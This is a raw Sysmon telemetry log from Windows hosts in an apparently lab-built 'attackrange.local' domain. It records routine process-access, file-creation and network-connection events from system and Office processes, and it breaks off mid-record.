14:57:30.999{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDA-607E-C60C-00000000BB01}3512C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074782Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.999{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074781Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.999{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDA-607E-D10C-00000000BB01}4800C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000050280Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:31.192{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81AB01C3088B2ABC1F9CFA42ABDAD2E4,SHA256=FD2F0C75568697561CB62FB7C10BEBC7591DBEA900874598BE0754E84AA4197F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074943Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.921{A7A01FEF-B626-607E-1100-00000000BB01}1176NT AUTHORITY\LOCAL SERVICEC:\Windows\system32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\FontCache-Obsolete-593.datMD5=2C7CE2DF6636BD4DAF14FB915C28DA80,SHA256=82BC91BEEE5599227AA393A1E54F6EDC561F29080093DB59D3088404855A05D1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074942Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.921{A7A01FEF-EBDC-607E-DB0C-00000000BB01}32446000C:\Windows\system32\conhost.exe{A7A01FEF-EBDC-607E-DA0C-00000000BB01}6440C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074941Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.905{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBDC-607E-DB0C-00000000BB01}3244C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074940Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.905{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBDC-607E-DA0C-00000000BB01}6440C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074939Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.905{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50921828C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EBDC-607E-DA0C-00000000BB01}6440C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108db1|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108beb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+108859|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+7330e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+7319a|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4436c6|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+442954|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074938Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.889{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDC-607E-D90C-00000000BB01}7016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074937Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.889{A7A01FEF-EBDA-607E-CF0C-00000000BB01}4380NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\integrator.exe.db-walMD5=D5FDDE9D51355DFAA6B70A057EC1D648,SHA256=6DEABB956E5240A2B2BE343D81DF752EE6FE558554883ABF3548C9ED1A188248,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074936Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.889{A7A01FEF-EBDA-607E-CF0C-00000000BB01}4380NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Office\OTele\integrator.exe.db-shmMD5=4204493FDB8B131592816CA333D80274,SHA256=84283441446190B2483E3CCFE1C40BF31E647D586B70D5862501BB47E6AE7679,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000074935Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.917{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-32556-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000074934Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.762{A7A01FEF-EBDA-607E-BA0C-00000000BB01}1992C:\Program Files\Microsoft Office\root\Integration\Integrator.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57536-false52.114.77.33-443https 10341000x800000000000000074933Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.874{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBDC-607E-D90C-00000000BB01}7016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074932Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.874{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDC-607E-D90C-00000000BB01}7016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000074931Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.796{A7A01FEF-B626-607E-1400-00000000BB01}12762020C:\Windows\system32\svchost.exe{A7A01FEF-EBDA-607E-CF0C-00000000BB01}4380C:\Program Files\Microsoft Office\root\integration\integrator.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074930Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.796{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074929Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.780{A7A01FEF-B626-607E-1100-00000000BB01}1176NT AUTHORITY\LOCAL SERVICEC:\Windows\system32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\FontCache-Obsolete-421.datMD5=CB712239FFE818E6270A8D26366753E0,SHA256=2B7DD1B5C2DC53CAF461F7109110DDFA70590F4CEA6EFDB7B2006EC3A01C037F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074928Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.749{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074927Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.717{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074926Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.686{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074925Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.671{A7A01FEF-EBDA-607E-CF0C-00000000BB01}4380NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Windows\Temp\WIN-DC-339-20210420-1457a.logMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074924Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.671{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074923Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.639{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074922Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.624{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074921Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.608{A7A01FEF-B626-607E-1100-00000000BB01}1176NT AUTHORITY\LOCAL SERVICEC:\Windows\system32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\FontCache-Obsolete-250.datMD5=95884D28AEB1A55B169D9DCF2E58CFF6,SHA256=AFCA487DE7C97EFA93F3549A4B21AAA3866A49BFAA5F2E302A8C03E20DE8E2E3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074920Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.592{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074919Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.592{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDA-607E-CF0C-00000000BB01}4380C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074918Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.577{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074917Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.561{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074916Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.561{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDC-607E-D80C-00000000BB01}1560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074915Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.546{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074914Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.530{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBDC-607E-D80C-00000000BB01}1560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074913Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.530{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDC-607E-D80C-00000000BB01}1560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000074912Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.530{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft 